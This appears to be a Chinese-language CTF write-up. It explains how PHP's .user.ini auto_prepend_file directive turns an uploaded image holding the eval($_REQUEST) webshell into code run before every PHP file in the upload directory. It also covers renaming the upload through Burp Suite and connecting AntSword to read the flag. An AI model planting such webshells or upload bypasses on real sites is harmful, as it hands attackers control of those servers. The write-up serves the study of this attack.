.user.ini
本身不是漏洞,但它经常被攻击者利用来实施攻击,属于配置滥用或权限提升类型的安全问题。
具体的攻击手法:
攻击者最常利用的是
auto_prepend_file
和auto_append_file
这两个指令。攻击步骤:
找到入口:攻击者先通过其他漏洞(如程序漏洞、弱密码等)获得在网站目录上传文件的权限。
上传恶意文件 :上传一个包含后门代码的图片或文本文件,比如
evil.jpg
,内容其实是<?php @eval($_REQUEST['cmd']); ?>
创建或修改.user.ini :在上传目录创建或修改
.user.ini
文件,内容为:auto_prepend_file = evil.jpg
后果 :现在该目录下的每一个PHP文件在执行时,都会自动先执行
evil.jpg
中的恶意代码,攻击者就获得了整个目录的控制权。
CTF之文件上传:利用.user.ini文件获取控制权限
1.看到这个题目,就知道要上传图片来获取权限
2.这时我构造了一个带有恶意代码的图片文件,命名为a.jpg,但是直接上传是不可能获取权限的,服务器看到.jpg, .txt, .html这些扩展名,会认为它们是静态文件(图片、文本、网页),它会直接读取文件的内容,并发送给浏览器,不会调用 PHP 解释器。
这时.user.ini配置文件就起作用了,PHP 解释器开始工作前,先读取并应用了目录下的.user.ini配置文件,利用.user.ini的
auto_prepend_file
指令,将一个本不会被执行的图片木马(a.jpg)变成在每个 PHP 文件执行前都会自动运行的前置文件,从而劫持整个目录的执行流程。它先要去执行a.jpg
文件,虽然 a.jpg扩展名是 .jpg,但此时它是在 PHP 解释器内部被包含的,PHP 解释器不在乎文件扩展名,它只认文件内容里的<?php ?>
标签。于是,它成功地执行了a.jpg里的后门代码eval($_REQUEST['a'])
。(a是下面蚁剑连接网站的参数)3.因为系统无法将文件命名为.user.ini,只能暂时命名为user.ini,所以需要burpsuite拦截请求,将文件名改为.user.ini,并且将Content-type改为image/jpg类型才能被上传。
这时.user.ini就上传成功了
而a.jpg本来就是image/jpg类型,肯定能直接上传
4.蚁剑连接http://61.147.171.35:53191/uploads/index.php(不是直接连接
a.jpg
,而是连接一个该目录下肯定存在的正常 PHP 文件(index.php)),并设置参数为a(这个密码对应木马代码中的$_REQUEST['a']
的参数名)。连接时
(1)当你点击"测试连接"时,蚁剑向
http://61.147.171.35:53191/uploads/index.php
发送一个 HTTP 请求。(2)服务器准备执行
/uploads/index.php
。(3)在执行前,PHP 引擎读取并应用了
/uploads/
目录下的.user.ini
设置。根据auto_prepend_file=a.jpg
指令,PHP 引擎首先去包含并执行a.jpg
文件。PHP 解释器会解析a.jpg
中的<?php ... ?>
标签,于是eval($_REQUEST['a'])
这行代码被执行。(5)此时,蚁剑发送的请求中正好携带了参数
a
,其值是一段经过 Base64 编码的、用于测试连接的 PHP 代码(比如执行系统命令,列出当前目录的所有文件和详细信息)。eval
函数执行了这段代码,并将结果返回给蚁剑。(6)蚁剑收到响应,确认后门生效,显示"连接成功"。
获取权限后的操作:
- 连接成功后,蚁剑的界面(如截图所示)就变成了一个可视化的文件管理器。可以像操作本地文件夹一样,浏览服务器上的文件,最终找到并打开
/flag
文件,获取到flag内容,完成题目。